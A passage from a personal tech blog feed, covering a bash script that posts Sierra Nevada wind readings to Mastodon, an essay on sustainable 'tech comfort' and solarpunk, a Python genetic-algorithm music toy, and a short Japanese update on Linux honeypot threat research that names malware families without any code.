midnightdate=${midnight%,*}
midnighthour=${midnightdate#*T}
midnightwind=${midnight#*,}

morning=$(csvcut -c 1,3 mywindtoday.csv | head -n $mnline | tail -1)
morningdate=${morning%,*}
morninghour=${morningdate#*T}
morningwind=${morning#*,}

afternoon=$(csvcut -c 1,3 mywindtoday.csv | head -n $mdline | tail -1)
afternoondate=${afternoon%,*}
afternoonhour=${afternoondate#*T}
afternoonwind=${afternoon#*,}

evening=$(csvcut -c 1,3 mywindtoday.csv | head -n $eveline | tail -1)
evedate=${evening%,*}
evehour=${evedate#*T}
evewind=${evening#*,}

night=$(csvcut -c 1,3 mywindtoday.csv | head -n $lines | tail -1)
ngtdate=${night%,*}
ngthour=${ngtdate#*T}

Now all I had to do was save it all into a text document in a readable format:

touch mywindtoot

echo "Detalles del viento en Sierra Nevada" >> mywindtoot
echo "A las $midnighthour de hoy,  $midnightwind k/h" >> mywindtoot
echo "A las $morninghour de hoy,  $morningwind k/h" >> mywindtoot
echo "A las $afternoonhour de hoy,  $afternoonwind k/h">> mywindtoot
echo "A las $evehour de hoy, $evewind k/h">> mywindtoot
echo "A las $ngthour de hoy, $ngtwind k/h">> mywindtoot

And, if I wanted to toot it:

toot post "$(cat mywindtoot)"

Or if I just wanted to read it in the terminal, I just cat it.

Detalles del viento en Sierra Nevada
A las 00:00 de hoy,  15.8 k/h
A las 09:00 de hoy,  8.0 k/h
A las 14:00 de hoy,  19.5 k/h
A las 18:00 de hoy, 2.2 k/h
A las 23:00 de hoy, 14.1 k/h

Finally a little clean up:

rm mywindtoot
rm mywindtoday

And that's it! My first test using it in Mastodon worked just fine. You can check the whole code here. Why don't you try to build something similar for your city? Maybe share with your neighborhood.

Tech Comfort

Paula — Thu, 05 Oct 2023 18:01:11 +0000

The first time I realized about the "tech comfort" thing was the time I was given a Linux and a reason for being given a Linux.

But let me explain.

Science Fiction inspires a lot of scientists and developers into building and feeling comfort with technology. At some point I believe what we watched and read sometimes guided us into feeling that way or another towards technology.

I think a lot about this when I see some tech over there and I ask myself "but why?" and sometimes the answer is that it's flashy and we are facing a lot of uncomfortable things in our daily life, things that escape our reach, and we just want to feel comfort in those flashy techie things, since it reminds us of fun "sci-fi".

There was a huge life-changing moment in my life when I started reading Ursula's K Le Guin. Until then, as a sci-fi lover I was excusing tons of things that I saw that were uncomfortable, trading them with the joy that the rest of the story would bring me. ut then I found a spot of sense, complexity and human rights blended with scifi I didn't quite encounter before in the same way. It was a very similar comfort I found when I saw "Princess Mononoke" or "Nausicaä", and it wasn't until very recently (few years) that I found out about the concept of solarpunk.

Going back to tech, which is our deal over here, I studied an expertise in electronics back there in the computer engineering grade. I must say my whole interest in programming and computing when I was a kid was towards androids and replicants and the concept of machines thinking by themselves, but at some point I just lost interest of that because I discovered things like digital rights, repairing and building things from other things. Electronics felt like crafting, and I just got into it. By that time I started working as a programmer and got in contact with classmates and coworkers who enjoyed programming and tech just because. I think a lot of us can relate. Yet at that time I felt "something's not right".

My first question before continuing with this article is, have you felt like that as well? have you felt that tiny little "this is not quite right but I don't know why" feeling?

Anyway, while I started working in a complete different field, I enjoyed using my electronics knowledge in stories. I've been writing scifi since I was a teenager, and I still do. At some point I just needed to feel the same comfort I found in solarpunk works, so I started writing and thinking towards that. I thought "hey this is not that impossible tbh", and I started asking around my community about it, and some people showed their writings, too. I discovered then some other persons are trying to live like that, and then I got towards minimal computing and toning down tech. At this point I was questioning myself, "how much of this makes sense in our daily life?" and it's been a really complex question that I'm still working towards to. Until now all I got clear was the fact that it makes sense to keep the "this is not right" feeling alive, as a way of pinching myself to look for -general- comfort on tech.

What is comfort for a person growing up in a climate crisis?

I discovered, after reading other people ideas, and spending times wondering on my own that this sort of tech makes sense only if the community and the society it evolves think towards the values of co-work, empathy and constant reviewing. This is not an original idea at all. Susan Leigh Star and other of her colleagues in the field of sociology towards information in modern society came to the conclusion that there are many invisible elements in society that are critically needed to make everything works the way it works, and understanding how some of those elements work together (even if they don't even know themselves) it's the way of changing unfair or uncomfortable actions (she for example researched feminism in those terms). Feeling of comfort are just feelings, but a community of people caring for each other comforts makes a lot more tangible sense. Therefore, sustainable technology only makes sense in a sustainable context: using solar power panels to partially fuel a massive data center that requites tons and tons of clean water in a country under drought doesn't makes sense, but when you only see the solar panel thing, it maybe looks like it does, because as a developer or as an user, you might relate it with a fast response in a platform. Depending on your values maybe even the water thing, because what could we do about it?

I recently worked -slowly- towards the goal of reading off-line. Turns out I'm the "I need to check this a lot of times" kind of person, and every time we click and load a site (and even more nowadays) we are asking for adverts, data collecting, statistics and more. Apart from the fact that this makes me uncomfortable it takes a really long time, while if downloading it once, I can check it whenever I need. It seems awfully obvious but I got in the "everything is online all the time" train and I forgot about that, until I read about a couple of persons who live in a boat and needed to download texts a lot so to be able to read or enjoy those, because Internet doesn't always work. I'm absolutely not in that situation but I'd hate to feel anxious about not having Internet connection, or not being able to access to critical info if somehow I lost my Internet connection, so I've been slowly working towards this. Would you feel anxious if you didn't have Internet for a long while?

Anyway, I found a really interesting project called "Gemini protocol" that is thought and built with these sort of questions in mind. All about using simple, straightforward resources and linking images or media instead. There are many ways of browsing the contents, my favorite is amfora, a in-terminal application, but there are others.

What I want to say is that tech is a tool, a method to reach and build something else, and what we make with it is a statement. I've learnt about it through the Free Software community, but somehow I think it's more than just sharing and explaining, it's about thinking what we've built and, maybe, start over at some point (even if it looks like stepping backwards in terms of "productivity") since it might be the key of building a more comfortable way of understanding and interacting with technology, the type of comfort that has to be thought slowly, in community, sometimes offline.

When someone points out the new techie trend is not sustainable, what do you think? do you think "party killer"? if so, how attached are you to that tech?

I usually confront this feeling, as a techie person myself. But I'm also given that answer when I try to justify changes in Free software communities for supporting feminism and sustainability, moving the focus to the context of people instead of tech (though I must say most of the people are wonderful and regardless if they agree or not they try to discuss in a friendly open way). I love programming, I love trying new things, I love confronting technical challenges, yet I don't want those feelings to get the shape of productivity and tech-empowerment above everything else. I somehow want to spend a lot of time, sometimes months thinking about the shape of digital elements in life.

In a story I'm writing, the main character (a researcher in a moon with an extreme weather) is meant to do a scientific research. Somehow I imagined a cranky computer, e-paper screen, with a sliding keyboard that she sort of release from the wall, in which she uses an IRC and a repo to talk to her peers. She uses some sand and solar batteries to make that and the electronics for the research work. This made me feel happy, as weird as it sounds.

In another story that I wrote, the main character is a weather analyst, what is called "Clouds" in a future Al-Andalus shaped society (the past society that used to live where I was born), and people are used to download off-line maps and text from local docks in libraries and trains. And this made me happy, again as weird as it sounds.

But what I feel is or not "happy tech" is not important, actually.

What sort of technology makes you happy? Have you ever stopped to think why?

Maybe spending some time asking yourself that is nice, there's no rush really. Sometimes social media makes us think there's rush. On that, on everything; There isn't.

But it might be an interesting exercise, so to understand why are we doing what we are doing. Our digital actions, as users or as developers, have consequences. Are we having a choice upon those actions? Should we be having more?

TinEAR, using GA for music inspiration

Paula — Thu, 28 Sep 2023 10:32:25 +0000

I'm very interested in art experimentation as well as tech and sustainability. I recently participated in a live programming workshop meant for music creation. One of the guys conducting the workshop mentioned the fact of slight imperfections (usually not noticeable by the human regular ear) of human artists against programmed music. Somehow this made me think of how some imperfections lead to more interesting works than the one that was previously attempted. How could I work around a terminal toy that was "imperfect" in its attempts to play music?

I'm very interested in sustainability and de-escalating tech resources, so I refused to work towards AI, but I thought of working with GA. The idea is for the toy to attempt to reach a collection of notes, each attempt more close, but not quite until it reaches the correct ones.

In order to do this I chose python3 and a very simple GA structure, the same that would try to guess a word.

This is an example usage:

python3 tinear.py
TARGET: AABC
MAXIMUN GENERATIONS ALLOWED: 7

Generation: 1   String: AACC    Fitness: 1
Generation: 2   String: AABC    Fitness: 0

In this case it was lucky and guessed the right one the second time (generation 2). In order to play music directly from the terminal, I use os.system defining a command with variable chords (the ones asked to the user at the execution) and play -n synth pl.

The result is that each guess, the terminal plays the attempting tune, making it fun when doing some live coding jams.

I mixed the tinear attempts with some synthesizer tunes using teenage engineering devices and created some imperfect, yet fun music! You can find the script here.

Hello back! Sharing some projects

Paula — Wed, 27 Sep 2023 13:34:53 +0000

もっと日本語ともっとCYBERSECURITYを勉強だから数年前にここに書くのをやめましたいま私は現在6年のサイバー脅威の専門家です日本へいきましたそれから私の日本語と私の実務経験は前回よりも優れています

新しいプロジェクトに向けて取り組んでいます!
それを共有したい

LINUXのサイバー脅威の最先端の研究

私はLINUXのサイバー脅威について1年間研究しました。そのために初めCOWRIEのHONEYPOTを使用しました。。。このリンクはそののリポジトリです
私は3つのイベントにその研究をみせって (スペイン語と英語です)

AlienVaultで結果を公開しました

2022年にcryptominersは人気になりましたでも2023年にstealersはcryptominersより人気になりました
また、Malware複雑になりました

例えばここにいくつかの最近見たのTTPがあります

Command&Controlとして使われたTelegramのbots (T1102.002 MITRE)
2FAのポケんンを窃盗 --- SMS例えば (T11111 MITRE)
Anti-VM (VMを回避) (T1497 MITRE)

それでわ最近のキャンペーンは Ransomware (Cyclops, Conti), Stealers (The White Snake), toolkits (Reptile) とその他など

STEALERS

WindowsとLinuxとMacOSのStealersは人気が出てきています
一部のRansomwareもう暗号化を使用していませんそれはDataを盗むだけです

いま一部の人気のStealersはMeduzaとRacoonとRedlineとBanditとNodeStealerとVidar
ここで部分的に見ることができます。例えばその統計はRedlineの量が増えていますと書いてある

Stealers も他のマルウェアのコードをリサイクルします! 例えばQuasarとAsyncRAT（RACOONでっと）

すぐこれについて書きます!

Original post